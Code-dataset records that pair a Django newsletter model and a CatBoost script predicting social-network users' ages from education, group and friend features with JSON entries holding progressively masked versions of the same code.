target = models.IntegerField()
frequency = models.CharField(max_length=10, choices=FREQUENCY, default='monthly')
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
author = models.ForeignKey(User, on_delete=models.CASCADE, null=True)
tag = models.ManyToManyField(Tags)
@property
def subscribed(self):
return 10
def __str__(self):
return self.name
class Meta:
ordering = ('-created_at',)
|
normal
|
{
"blob_id": "71503282e58f60e0936a5236edc094f1da937422",
"index": 6565,
"step-1": "<mask token>\n\n\nclass Tags(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n ordering = '-created_at',\n\n\nclass Newsletter(models.Model):\n name = models.CharField(max_length=200)\n description = models.CharField(max_length=10000)\n image = models.ImageField()\n target = models.IntegerField()\n frequency = models.CharField(max_length=10, choices=FREQUENCY, default=\n 'monthly')\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n author = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n tag = models.ManyToManyField(Tags)\n\n @property\n def subscribed(self):\n return 10\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n ordering = '-created_at',\n",
"step-2": "<mask token>\n\n\nclass Tags(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.name\n\n def save(self, *arg, **kwargs):\n if not self.slug:\n self.slug = slugify(self.name)\n super(Tags, self).save(*arg, **kwargs)\n\n\n class Meta:\n ordering = '-created_at',\n\n\nclass Newsletter(models.Model):\n name = models.CharField(max_length=200)\n description = models.CharField(max_length=10000)\n image = models.ImageField()\n target = models.IntegerField()\n frequency = models.CharField(max_length=10, choices=FREQUENCY, default=\n 'monthly')\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n author = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n tag = models.ManyToManyField(Tags)\n\n @property\n def subscribed(self):\n return 10\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n ordering = '-created_at',\n",
"step-3": "<mask token>\n\n\nclass Tags(models.Model):\n name = models.CharField(max_length=100)\n slug = models.CharField(max_length=150)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.name\n\n def save(self, *arg, **kwargs):\n if not self.slug:\n self.slug = slugify(self.name)\n super(Tags, self).save(*arg, **kwargs)\n\n\n class Meta:\n ordering = '-created_at',\n\n\nclass Newsletter(models.Model):\n name = models.CharField(max_length=200)\n description = models.CharField(max_length=10000)\n image = models.ImageField()\n target = models.IntegerField()\n frequency = models.CharField(max_length=10, choices=FREQUENCY, default=\n 'monthly')\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n author = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n tag = models.ManyToManyField(Tags)\n\n @property\n def subscribed(self):\n return 10\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n ordering = '-created_at',\n",
"step-4": "from django.utils.text import slugify\nfrom pyexpat import model\nfrom django.db import models\nfrom rest_framework_simplejwt.state import User\nFREQUENCY = ('daily', 'Diario'), ('weekly', 'Semanal'), ('monthly', 'Mensual')\n\n\nclass Tags(models.Model):\n name = models.CharField(max_length=100)\n slug = models.CharField(max_length=150)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.name\n\n def save(self, *arg, **kwargs):\n if not self.slug:\n self.slug = slugify(self.name)\n super(Tags, self).save(*arg, **kwargs)\n\n\n class Meta:\n ordering = '-created_at',\n\n\nclass Newsletter(models.Model):\n name = models.CharField(max_length=200)\n description = models.CharField(max_length=10000)\n image = models.ImageField()\n target = models.IntegerField()\n frequency = models.CharField(max_length=10, choices=FREQUENCY, default=\n 'monthly')\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n author = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n tag = models.ManyToManyField(Tags)\n\n @property\n def subscribed(self):\n return 10\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n ordering = '-created_at',\n",
"step-5": "from django.utils.text import slugify\nfrom pyexpat import model\nfrom django.db import models\n# Create your models here.\nfrom rest_framework_simplejwt.state import User\n\nFREQUENCY = (\n ('daily', 'Diario'),\n ('weekly', 'Semanal'),\n ('monthly', 'Mensual')\n)\n\nclass Tags(models.Model):\n name = models.CharField(max_length=100)\n slug = models.CharField(max_length=150)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.name\n\n def save(self, *arg, **kwargs):\n if not self.slug:\n self.slug = slugify(self.name)\n super(Tags, self).save(*arg, **kwargs)\n\n class Meta:\n ordering = ('-created_at',)\n\nclass Newsletter(models.Model):\n name = models.CharField(max_length=200)\n description = models.CharField(max_length=10000)\n image = models.ImageField()\n target = models.IntegerField()\n frequency = models.CharField(max_length=10, choices=FREQUENCY, default='monthly')\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n author = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n tag = models.ManyToManyField(Tags)\n @property\n def subscribed(self):\n return 10\n\n def __str__(self):\n return self.name\n\n class Meta:\n ordering = ('-created_at',)\n\n",
"step-ids": [
5,
7,
8,
10,
11
]
}
|
[
5,
7,
8,
10,
11
] |
from typing import List
import pandas as pd
import numpy as np
import pickle
from catboost import CatBoostRegressor
from sklearn.preprocessing import MinMaxScaler
def calculate_probable_age(usersEducationFeatures):
prob_age = {}
grads_count = {}
age_diff1 = 17 # age difference for school
age_diff2 = 22 # age difference for university
for index in usersEducationFeatures.index:
count = 0
skip = False
if not pd.isnull(usersEducationFeatures.at[index, "school_education"]):
prob_age[usersEducationFeatures.at[index, "uid"]] = (
2021 + age_diff1 - usersEducationFeatures.at[index, "school_education"]
)
skip = True
for i in range(1, 8):
if skip:
break
if not pd.isnull(usersEducationFeatures.at[index, f"graduation_{i}"]):
prob_age[usersEducationFeatures.at[index, "uid"]] = (
2021 + age_diff2 - usersEducationFeatures.at[index, f"graduation_{i}"]
)
skip = True
if not pd.isnull(usersEducationFeatures.at[index, "school_education"]):
count += 1
for i in range(1, 8):
if not pd.isnull(usersEducationFeatures.at[index, f"graduation_{i}"]):
count += 1
grads_count[usersEducationFeatures.at[index, "uid"]] = count
return prob_age, grads_count
def get_prob_age(uids, prob_age) -> List[int]:
res = [0] * len(uids)
for i, uid in enumerate(uids):
res[i] = prob_age.setdefault(uid, 0)
return res
def get_grads_count(uids, grads_count) -> List[int]:
res = [0] * len(uids)
for i, uid in enumerate(uids):
res[i] = grads_count.setdefault(uid, 0)
return res
def get_groups_count(uids, usersGroups):
tmp = usersGroups.groupby("uid").count()
groups_count = [0] * len(uids)
for i, uid in enumerate(uids):
try:
groups_count[i] = tmp.at[uid, "gid"]
except:
continue
return groups_count
def get_mean_and_median_group(uids, gid2age, uid_groups):
mean_group = [0.0] * len(uids)
median_group = [0.0] * len(uids)
for i, uid in enumerate(uids):
try:
tmp = [gid2age[x] for x in uid_groups[uid]]
mean_group[i] = sum(tmp) / len(tmp)
median_group[i] = np.median(tmp)
except:
continue
return mean_group, median_group
def get_mean_and_median_friends(uids, uid2age, uid_friends):
mean_friends = [0.0] * len(uids)
median_friends = [0.0] * len(uids)
mean_friends2 = [0.0] * len(uids)
for i, uid in enumerate(uids):
try:
tmp = []
if uid in uid_friends and len(uid_friends[uid]) < 42:
for friend in uid_friends[uid]:
if friend in uid_friends:
for f2 in uid_friends[friend]:
if f2 != uid and f2 in uid2age:
tmp.append(uid2age[f2])
mean_friends2[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0
tmp = [uid2age[x] for x in uid_friends[uid] if x in uid2age]
mean_friends[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0.0
median_friends[i] = np.median(tmp) if len(tmp) != 0 else 0.0
except:
continue
return mean_friends, median_friends, mean_friends2
def main():
with open("gid2age.pkl", "rb") as fin:
gid2age = pickle.load(fin)
with open("uid2age.pkl", "rb") as fin:
uid2age = pickle.load(fin)
with open("uid_friends.pkl", "rb") as fin:
uid_friends = pickle.load(fin)
with open("scaler.pkl", "rb") as fin:
scaler = pickle.load(fin)
model = CatBoostRegressor()
model.load_model("model")
test = pd.read_csv("/tmp/data/test.csv")
testEducationFeatures = pd.read_csv("/tmp/data/testEducationFeatures.csv")
testGroups = pd.read_csv("/tmp/data/testGroups.csv")
test["cfriends"] = 0
for index in test.index:
uid = test.at[index, "uid"]
if uid in uid_friends:
test.at[index, "cfriends"] = len(uid_friends[uid])
else:
test.at[index, "cfriends"] = 0
prob_age, grads_count = calculate_probable_age(testEducationFeatures)
test["prob_age"] = get_prob_age(test.uid, prob_age)
test["grads_count"] = get_grads_count(test.uid, grads_count)
test["groups_count"] = get_groups_count(test.uid, testGroups)
uid_groups = {}
for index in testGroups.index:
uid = testGroups.at[index, "uid"]
uid_groups[uid] = uid_groups.setdefault(uid, []) + [testGroups.at[index, "gid"]]
test["mean_group_age"], test["median_group_age"] = get_mean_and_median_group(test.uid, gid2age, uid_groups)
test["mean_friends_age"], test["median_friends_age"], test["mean_friends2_age"] = get_mean_and_median_friends(
test.uid, uid2age, uid_friends
)
test["is_prob_age"] = test.prob_age != 0
test["is_group_age"] = test.mean_group_age != 0
test["is_friends_age"] = test.mean_friends_age != 0
X_test = scaler.transform(test.drop(["uid"], axis=1))
y_pred = model.predict(X_test)
res = pd.DataFrame({"uid": test.uid, "age": y_pred})
res.to_csv("/var/log/result", header=True, index=False)
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "ee0ed255b6851696dc57c01100cd67f5f959cf01",
"index": 7437,
"step-1": "<mask token>\n\n\ndef get_prob_age(uids, prob_age) ->List[int]:\n res = [0] * len(uids)\n for i, uid in enumerate(uids):\n res[i] = prob_age.setdefault(uid, 0)\n return res\n\n\ndef get_grads_count(uids, grads_count) ->List[int]:\n res = [0] * len(uids)\n for i, uid in enumerate(uids):\n res[i] = grads_count.setdefault(uid, 0)\n return res\n\n\ndef get_groups_count(uids, usersGroups):\n tmp = usersGroups.groupby('uid').count()\n groups_count = [0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n groups_count[i] = tmp.at[uid, 'gid']\n except:\n continue\n return groups_count\n\n\ndef get_mean_and_median_group(uids, gid2age, uid_groups):\n mean_group = [0.0] * len(uids)\n median_group = [0.0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n tmp = [gid2age[x] for x in uid_groups[uid]]\n mean_group[i] = sum(tmp) / len(tmp)\n median_group[i] = np.median(tmp)\n except:\n continue\n return mean_group, median_group\n\n\ndef get_mean_and_median_friends(uids, uid2age, uid_friends):\n mean_friends = [0.0] * len(uids)\n median_friends = [0.0] * len(uids)\n mean_friends2 = [0.0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n tmp = []\n if uid in uid_friends and len(uid_friends[uid]) < 42:\n for friend in uid_friends[uid]:\n if friend in uid_friends:\n for f2 in uid_friends[friend]:\n if f2 != uid and f2 in uid2age:\n tmp.append(uid2age[f2])\n mean_friends2[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0\n tmp = [uid2age[x] for x in uid_friends[uid] if x in uid2age]\n mean_friends[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0.0\n median_friends[i] = np.median(tmp) if len(tmp) != 0 else 0.0\n except:\n continue\n return mean_friends, median_friends, mean_friends2\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_prob_age(uids, prob_age) ->List[int]:\n res = [0] * len(uids)\n for i, uid in enumerate(uids):\n res[i] = prob_age.setdefault(uid, 0)\n return res\n\n\ndef get_grads_count(uids, grads_count) ->List[int]:\n res = [0] * len(uids)\n for i, uid in enumerate(uids):\n res[i] = grads_count.setdefault(uid, 0)\n return res\n\n\ndef get_groups_count(uids, usersGroups):\n tmp = usersGroups.groupby('uid').count()\n groups_count = [0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n groups_count[i] = tmp.at[uid, 'gid']\n except:\n continue\n return groups_count\n\n\ndef get_mean_and_median_group(uids, gid2age, uid_groups):\n mean_group = [0.0] * len(uids)\n median_group = [0.0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n tmp = [gid2age[x] for x in uid_groups[uid]]\n mean_group[i] = sum(tmp) / len(tmp)\n median_group[i] = np.median(tmp)\n except:\n continue\n return mean_group, median_group\n\n\ndef get_mean_and_median_friends(uids, uid2age, uid_friends):\n mean_friends = [0.0] * len(uids)\n median_friends = [0.0] * len(uids)\n mean_friends2 = [0.0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n tmp = []\n if uid in uid_friends and len(uid_friends[uid]) < 42:\n for friend in uid_friends[uid]:\n if friend in uid_friends:\n for f2 in uid_friends[friend]:\n if f2 != uid and f2 in uid2age:\n tmp.append(uid2age[f2])\n mean_friends2[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0\n tmp = [uid2age[x] for x in uid_friends[uid] if x in uid2age]\n mean_friends[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0.0\n median_friends[i] = np.median(tmp) if len(tmp) != 0 else 0.0\n except:\n continue\n return mean_friends, median_friends, mean_friends2\n\n\ndef main():\n with open('gid2age.pkl', 'rb') as fin:\n gid2age = pickle.load(fin)\n with open('uid2age.pkl', 'rb') as fin:\n uid2age = pickle.load(fin)\n with open('uid_friends.pkl', 'rb') as fin:\n uid_friends = pickle.load(fin)\n with open('scaler.pkl', 'rb') as fin:\n scaler = pickle.load(fin)\n model = CatBoostRegressor()\n model.load_model('model')\n test = pd.read_csv('/tmp/data/test.csv')\n testEducationFeatures = pd.read_csv('/tmp/data/testEducationFeatures.csv')\n testGroups = pd.read_csv('/tmp/data/testGroups.csv')\n test['cfriends'] = 0\n for index in test.index:\n uid = test.at[index, 'uid']\n if uid in uid_friends:\n test.at[index, 'cfriends'] = len(uid_friends[uid])\n else:\n test.at[index, 'cfriends'] = 0\n prob_age, grads_count = calculate_probable_age(testEducationFeatures)\n test['prob_age'] = get_prob_age(test.uid, prob_age)\n test['grads_count'] = get_grads_count(test.uid, grads_count)\n test['groups_count'] = get_groups_count(test.uid, testGroups)\n uid_groups = {}\n for index in testGroups.index:\n uid = testGroups.at[index, 'uid']\n uid_groups[uid] = uid_groups.setdefault(uid, []) + [testGroups.at[\n index, 'gid']]\n test['mean_group_age'], test['median_group_age'\n ] = get_mean_and_median_group(test.uid, gid2age, uid_groups)\n test['mean_friends_age'], test['median_friends_age'], test[\n 'mean_friends2_age'] = get_mean_and_median_friends(test.uid,\n uid2age, uid_friends)\n test['is_prob_age'] = test.prob_age != 0\n test['is_group_age'] = test.mean_group_age != 0\n test['is_friends_age'] = test.mean_friends_age != 0\n X_test = scaler.transform(test.drop(['uid'], axis=1))\n y_pred = model.predict(X_test)\n res = pd.DataFrame({'uid': test.uid, 'age': y_pred})\n res.to_csv('/var/log/result', header=True, index=False)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef calculate_probable_age(usersEducationFeatures):\n prob_age = {}\n grads_count = {}\n age_diff1 = 17\n age_diff2 = 22\n for index in usersEducationFeatures.index:\n count = 0\n skip = False\n if not pd.isnull(usersEducationFeatures.at[index, 'school_education']):\n prob_age[usersEducationFeatures.at[index, 'uid']\n ] = 2021 + age_diff1 - usersEducationFeatures.at[index,\n 'school_education']\n skip = True\n for i in range(1, 8):\n if skip:\n break\n if not pd.isnull(usersEducationFeatures.at[index,\n f'graduation_{i}']):\n prob_age[usersEducationFeatures.at[index, 'uid']\n ] = 2021 + age_diff2 - usersEducationFeatures.at[index,\n f'graduation_{i}']\n skip = True\n if not pd.isnull(usersEducationFeatures.at[index, 'school_education']):\n count += 1\n for i in range(1, 8):\n if not pd.isnull(usersEducationFeatures.at[index,\n f'graduation_{i}']):\n count += 1\n grads_count[usersEducationFeatures.at[index, 'uid']] = count\n return prob_age, grads_count\n\n\ndef get_prob_age(uids, prob_age) ->List[int]:\n res = [0] * len(uids)\n for i, uid in enumerate(uids):\n res[i] = prob_age.setdefault(uid, 0)\n return res\n\n\ndef get_grads_count(uids, grads_count) ->List[int]:\n res = [0] * len(uids)\n for i, uid in enumerate(uids):\n res[i] = grads_count.setdefault(uid, 0)\n return res\n\n\ndef get_groups_count(uids, usersGroups):\n tmp = usersGroups.groupby('uid').count()\n groups_count = [0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n groups_count[i] = tmp.at[uid, 'gid']\n except:\n continue\n return groups_count\n\n\ndef get_mean_and_median_group(uids, gid2age, uid_groups):\n mean_group = [0.0] * len(uids)\n median_group = [0.0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n tmp = [gid2age[x] for x in uid_groups[uid]]\n mean_group[i] = sum(tmp) / len(tmp)\n median_group[i] = np.median(tmp)\n except:\n continue\n return mean_group, median_group\n\n\ndef get_mean_and_median_friends(uids, uid2age, uid_friends):\n mean_friends = [0.0] * len(uids)\n median_friends = [0.0] * len(uids)\n mean_friends2 = [0.0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n tmp = []\n if uid in uid_friends and len(uid_friends[uid]) < 42:\n for friend in uid_friends[uid]:\n if friend in uid_friends:\n for f2 in uid_friends[friend]:\n if f2 != uid and f2 in uid2age:\n tmp.append(uid2age[f2])\n mean_friends2[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0\n tmp = [uid2age[x] for x in uid_friends[uid] if x in uid2age]\n mean_friends[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0.0\n median_friends[i] = np.median(tmp) if len(tmp) != 0 else 0.0\n except:\n continue\n return mean_friends, median_friends, mean_friends2\n\n\ndef main():\n with open('gid2age.pkl', 'rb') as fin:\n gid2age = pickle.load(fin)\n with open('uid2age.pkl', 'rb') as fin:\n uid2age = pickle.load(fin)\n with open('uid_friends.pkl', 'rb') as fin:\n uid_friends = pickle.load(fin)\n with open('scaler.pkl', 'rb') as fin:\n scaler = pickle.load(fin)\n model = CatBoostRegressor()\n model.load_model('model')\n test = pd.read_csv('/tmp/data/test.csv')\n testEducationFeatures = pd.read_csv('/tmp/data/testEducationFeatures.csv')\n testGroups = pd.read_csv('/tmp/data/testGroups.csv')\n test['cfriends'] = 0\n for index in test.index:\n uid = test.at[index, 'uid']\n if uid in uid_friends:\n test.at[index, 'cfriends'] = len(uid_friends[uid])\n else:\n test.at[index, 'cfriends'] = 0\n prob_age, grads_count = calculate_probable_age(testEducationFeatures)\n test['prob_age'] = get_prob_age(test.uid, prob_age)\n test['grads_count'] = get_grads_count(test.uid, grads_count)\n test['groups_count'] = get_groups_count(test.uid, testGroups)\n uid_groups = {}\n for index in testGroups.index:\n uid = testGroups.at[index, 'uid']\n uid_groups[uid] = uid_groups.setdefault(uid, []) + [testGroups.at[\n index, 'gid']]\n test['mean_group_age'], test['median_group_age'\n ] = get_mean_and_median_group(test.uid, gid2age, uid_groups)\n test['mean_friends_age'], test['median_friends_age'], test[\n 'mean_friends2_age'] = get_mean_and_median_friends(test.uid,\n uid2age, uid_friends)\n test['is_prob_age'] = test.prob_age != 0\n test['is_group_age'] = test.mean_group_age != 0\n test['is_friends_age'] = test.mean_friends_age != 0\n X_test = scaler.transform(test.drop(['uid'], axis=1))\n y_pred = model.predict(X_test)\n res = pd.DataFrame({'uid': test.uid, 'age': y_pred})\n res.to_csv('/var/log/result', header=True, index=False)\n\n\n<mask token>\n",
"step-4": "from typing import List\nimport pandas as pd\nimport numpy as np\nimport pickle\nfrom catboost import CatBoostRegressor\nfrom sklearn.preprocessing import MinMaxScaler\n\n\ndef calculate_probable_age(usersEducationFeatures):\n prob_age = {}\n grads_count = {}\n age_diff1 = 17\n age_diff2 = 22\n for index in usersEducationFeatures.index:\n count = 0\n skip = False\n if not pd.isnull(usersEducationFeatures.at[index, 'school_education']):\n prob_age[usersEducationFeatures.at[index, 'uid']\n ] = 2021 + age_diff1 - usersEducationFeatures.at[index,\n 'school_education']\n skip = True\n for i in range(1, 8):\n if skip:\n break\n if not pd.isnull(usersEducationFeatures.at[index,\n f'graduation_{i}']):\n prob_age[usersEducationFeatures.at[index, 'uid']\n ] = 2021 + age_diff2 - usersEducationFeatures.at[index,\n f'graduation_{i}']\n skip = True\n if not pd.isnull(usersEducationFeatures.at[index, 'school_education']):\n count += 1\n for i in range(1, 8):\n if not pd.isnull(usersEducationFeatures.at[index,\n f'graduation_{i}']):\n count += 1\n grads_count[usersEducationFeatures.at[index, 'uid']] = count\n return prob_age, grads_count\n\n\ndef get_prob_age(uids, prob_age) ->List[int]:\n res = [0] * len(uids)\n for i, uid in enumerate(uids):\n res[i] = prob_age.setdefault(uid, 0)\n return res\n\n\ndef get_grads_count(uids, grads_count) ->List[int]:\n res = [0] * len(uids)\n for i, uid in enumerate(uids):\n res[i] = grads_count.setdefault(uid, 0)\n return res\n\n\ndef get_groups_count(uids, usersGroups):\n tmp = usersGroups.groupby('uid').count()\n groups_count = [0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n groups_count[i] = tmp.at[uid, 'gid']\n except:\n continue\n return groups_count\n\n\ndef get_mean_and_median_group(uids, gid2age, uid_groups):\n mean_group = [0.0] * len(uids)\n median_group = [0.0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n tmp = [gid2age[x] for x in uid_groups[uid]]\n mean_group[i] = sum(tmp) / len(tmp)\n median_group[i] = np.median(tmp)\n except:\n continue\n return mean_group, median_group\n\n\ndef get_mean_and_median_friends(uids, uid2age, uid_friends):\n mean_friends = [0.0] * len(uids)\n median_friends = [0.0] * len(uids)\n mean_friends2 = [0.0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n tmp = []\n if uid in uid_friends and len(uid_friends[uid]) < 42:\n for friend in uid_friends[uid]:\n if friend in uid_friends:\n for f2 in uid_friends[friend]:\n if f2 != uid and f2 in uid2age:\n tmp.append(uid2age[f2])\n mean_friends2[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0\n tmp = [uid2age[x] for x in uid_friends[uid] if x in uid2age]\n mean_friends[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0.0\n median_friends[i] = np.median(tmp) if len(tmp) != 0 else 0.0\n except:\n continue\n return mean_friends, median_friends, mean_friends2\n\n\ndef main():\n with open('gid2age.pkl', 'rb') as fin:\n gid2age = pickle.load(fin)\n with open('uid2age.pkl', 'rb') as fin:\n uid2age = pickle.load(fin)\n with open('uid_friends.pkl', 'rb') as fin:\n uid_friends = pickle.load(fin)\n with open('scaler.pkl', 'rb') as fin:\n scaler = pickle.load(fin)\n model = CatBoostRegressor()\n model.load_model('model')\n test = pd.read_csv('/tmp/data/test.csv')\n testEducationFeatures = pd.read_csv('/tmp/data/testEducationFeatures.csv')\n testGroups = pd.read_csv('/tmp/data/testGroups.csv')\n test['cfriends'] = 0\n for index in test.index:\n uid = test.at[index, 'uid']\n if uid in uid_friends:\n test.at[index, 'cfriends'] = len(uid_friends[uid])\n else:\n test.at[index, 'cfriends'] = 0\n prob_age, grads_count = calculate_probable_age(testEducationFeatures)\n test['prob_age'] = get_prob_age(test.uid, prob_age)\n test['grads_count'] = get_grads_count(test.uid, grads_count)\n test['groups_count'] = get_groups_count(test.uid, testGroups)\n uid_groups = {}\n for index in testGroups.index:\n uid = testGroups.at[index, 'uid']\n uid_groups[uid] = uid_groups.setdefault(uid, []) + [testGroups.at[\n index, 'gid']]\n test['mean_group_age'], test['median_group_age'\n ] = get_mean_and_median_group(test.uid, gid2age, uid_groups)\n test['mean_friends_age'], test['median_friends_age'], test[\n 'mean_friends2_age'] = get_mean_and_median_friends(test.uid,\n uid2age, uid_friends)\n test['is_prob_age'] = test.prob_age != 0\n test['is_group_age'] = test.mean_group_age != 0\n test['is_friends_age'] = test.mean_friends_age != 0\n X_test = scaler.transform(test.drop(['uid'], axis=1))\n y_pred = model.predict(X_test)\n res = pd.DataFrame({'uid': test.uid, 'age': y_pred})\n res.to_csv('/var/log/result', header=True, index=False)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from typing import List\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport pickle\r\nfrom catboost import CatBoostRegressor\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\n\r\ndef calculate_probable_age(usersEducationFeatures):\r\n prob_age = {}\r\n grads_count = {}\r\n age_diff1 = 17 # age difference for school\r\n age_diff2 = 22 # age difference for university\r\n for index in usersEducationFeatures.index:\r\n count = 0\r\n skip = False\r\n\r\n if not pd.isnull(usersEducationFeatures.at[index, \"school_education\"]):\r\n prob_age[usersEducationFeatures.at[index, \"uid\"]] = (\r\n 2021 + age_diff1 - usersEducationFeatures.at[index, \"school_education\"]\r\n )\r\n skip = True\r\n for i in range(1, 8):\r\n if skip:\r\n break\r\n if not pd.isnull(usersEducationFeatures.at[index, f\"graduation_{i}\"]):\r\n prob_age[usersEducationFeatures.at[index, \"uid\"]] = (\r\n 2021 + age_diff2 - usersEducationFeatures.at[index, f\"graduation_{i}\"]\r\n )\r\n skip = True\r\n\r\n if not pd.isnull(usersEducationFeatures.at[index, \"school_education\"]):\r\n count += 1\r\n for i in range(1, 8):\r\n if not pd.isnull(usersEducationFeatures.at[index, f\"graduation_{i}\"]):\r\n count += 1\r\n\r\n grads_count[usersEducationFeatures.at[index, \"uid\"]] = count\r\n return prob_age, grads_count\r\n\r\n\r\ndef get_prob_age(uids, prob_age) -> List[int]:\r\n res = [0] * len(uids)\r\n for i, uid in enumerate(uids):\r\n res[i] = prob_age.setdefault(uid, 0)\r\n return res\r\n\r\n\r\ndef get_grads_count(uids, grads_count) -> List[int]:\r\n res = [0] * len(uids)\r\n for i, uid in enumerate(uids):\r\n res[i] = grads_count.setdefault(uid, 0)\r\n return res\r\n\r\n\r\ndef get_groups_count(uids, usersGroups):\r\n tmp = usersGroups.groupby(\"uid\").count()\r\n groups_count = [0] * len(uids)\r\n for i, uid in enumerate(uids):\r\n try:\r\n groups_count[i] = tmp.at[uid, \"gid\"]\r\n except:\r\n continue\r\n return groups_count\r\n\r\n\r\ndef get_mean_and_median_group(uids, gid2age, uid_groups):\r\n mean_group = [0.0] * len(uids)\r\n median_group = [0.0] * len(uids)\r\n for i, uid in enumerate(uids):\r\n try:\r\n tmp = [gid2age[x] for x in uid_groups[uid]]\r\n mean_group[i] = sum(tmp) / len(tmp)\r\n median_group[i] = np.median(tmp)\r\n except:\r\n continue\r\n return mean_group, median_group\r\n\r\n\r\ndef get_mean_and_median_friends(uids, uid2age, uid_friends):\r\n mean_friends = [0.0] * len(uids)\r\n median_friends = [0.0] * len(uids)\r\n mean_friends2 = [0.0] * len(uids)\r\n for i, uid in enumerate(uids):\r\n try:\r\n tmp = []\r\n if uid in uid_friends and len(uid_friends[uid]) < 42:\r\n for friend in uid_friends[uid]:\r\n if friend in uid_friends:\r\n for f2 in uid_friends[friend]:\r\n if f2 != uid and f2 in uid2age:\r\n tmp.append(uid2age[f2])\r\n mean_friends2[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0\r\n tmp = [uid2age[x] for x in uid_friends[uid] if x in uid2age]\r\n mean_friends[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0.0\r\n median_friends[i] = np.median(tmp) if len(tmp) != 0 else 0.0\r\n except:\r\n continue\r\n return mean_friends, median_friends, mean_friends2\r\n\r\n\r\ndef main():\r\n with open(\"gid2age.pkl\", \"rb\") as fin:\r\n gid2age = pickle.load(fin)\r\n with open(\"uid2age.pkl\", \"rb\") as fin:\r\n uid2age = pickle.load(fin)\r\n with open(\"uid_friends.pkl\", \"rb\") as fin:\r\n uid_friends = pickle.load(fin)\r\n with open(\"scaler.pkl\", \"rb\") as fin:\r\n scaler = pickle.load(fin)\r\n model = CatBoostRegressor()\r\n model.load_model(\"model\")\r\n\r\n test = pd.read_csv(\"/tmp/data/test.csv\")\r\n testEducationFeatures = pd.read_csv(\"/tmp/data/testEducationFeatures.csv\")\r\n testGroups = pd.read_csv(\"/tmp/data/testGroups.csv\")\r\n\r\n test[\"cfriends\"] = 0\r\n for index in test.index:\r\n uid = test.at[index, \"uid\"]\r\n if uid in uid_friends:\r\n test.at[index, \"cfriends\"] = len(uid_friends[uid])\r\n else:\r\n test.at[index, \"cfriends\"] = 0\r\n\r\n prob_age, grads_count = calculate_probable_age(testEducationFeatures)\r\n test[\"prob_age\"] = get_prob_age(test.uid, prob_age)\r\n test[\"grads_count\"] = get_grads_count(test.uid, grads_count)\r\n\r\n test[\"groups_count\"] = get_groups_count(test.uid, testGroups)\r\n\r\n uid_groups = {}\r\n for index in testGroups.index:\r\n uid = testGroups.at[index, \"uid\"]\r\n uid_groups[uid] = uid_groups.setdefault(uid, []) + [testGroups.at[index, \"gid\"]]\r\n\r\n test[\"mean_group_age\"], test[\"median_group_age\"] = get_mean_and_median_group(test.uid, gid2age, uid_groups)\r\n\r\n test[\"mean_friends_age\"], test[\"median_friends_age\"], test[\"mean_friends2_age\"] = get_mean_and_median_friends(\r\n test.uid, uid2age, uid_friends\r\n )\r\n\r\n test[\"is_prob_age\"] = test.prob_age != 0\r\n test[\"is_group_age\"] = test.mean_group_age != 0\r\n test[\"is_friends_age\"] = test.mean_friends_age != 0\r\n\r\n X_test = scaler.transform(test.drop([\"uid\"], axis=1))\r\n\r\n y_pred = model.predict(X_test)\r\n\r\n res = pd.DataFrame({\"uid\": test.uid, \"age\": y_pred})\r\n\r\n res.to_csv(\"/var/log/result\", header=True, index=False)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n",
"step-ids": [
5,
6,
7,
9,
10
]
}
|
